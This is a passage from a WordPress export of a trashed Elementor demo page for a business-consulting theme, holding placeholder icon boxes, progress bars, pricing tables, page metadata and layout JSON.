		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
			<h4>Progress Bars</h4>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h4>Pricing Tables</h4>		
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
			<h4>Flip Boxes</h4>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
			<h4>Service Boxes</h4>		
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="#">Explore More</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>624</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[elements__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[625]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8e54f4f","elType":"section","settings":{"padding":{"unit":"px","top":"85","right":"0","bottom":"90","left":"0","isLinked":false}},"elements":[{"id":"d69842b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"374421e","elType":"widget","settings":{"title":"Icon Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2ece61d","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b6775b1"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":637},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"21732ff"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"e1d2100"}],"icon_size":{"unit":"px","size":48,"sizes":[]},"align":"left","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"},{"id":"9df710a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1178550","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2ba221f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e256b55","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"aae9912","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":42,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9736423","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"740d57b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"42a0f44","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1ed1cd4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"af68c9c","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"9f24e04","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"db8197f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"6d55426","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6c42f1a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"ccfedc3","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"cd58237","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bc1f0b","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"b140664","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ab511b8","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve beven a strategy thought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"29f766a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ad7d79d","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy tmhought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"3bd1a3a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"5ff8069","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":36,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"0422c24","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4893536","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"6a60a09","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_size":{"unit":"px","size":43,"sizes":[]},"icon_color":"#FFFFFF","icon_bg":"#4A81F9","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9089712","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"ea9b75f","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#4A81F9","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"4c25bc2","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"596b78b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"698ffdc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"eb94e32","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"be4a619","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bbe4b35","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8c33540","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"82fa562","elType":"widget","settings":{"title":"Progress Bars","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"37788eb","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5249351","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a17e202","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#4A81F9"},"elements":[],"widgetType":"iprogress"},{"id":"7213754","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#4A81F9"},"elements":[],"widgetType":"iprogress"},{"id":"173ab3c","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#4A81F9"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4501d0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"content_position":"center","align":"space-evenly","_ot_content_align":"horizontal"},"elements":[{"id":"6e13157","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#4A81F9"},"elements":[],"widgetType":"iprogress"},{"id":"712f4c6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#4A81F9"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a0928a2","elType":"widget","settings":{"title":"Pricing Tables","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4b24f46","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3254d38","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"01efe9e","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"16a9414","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"15b3e04","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your 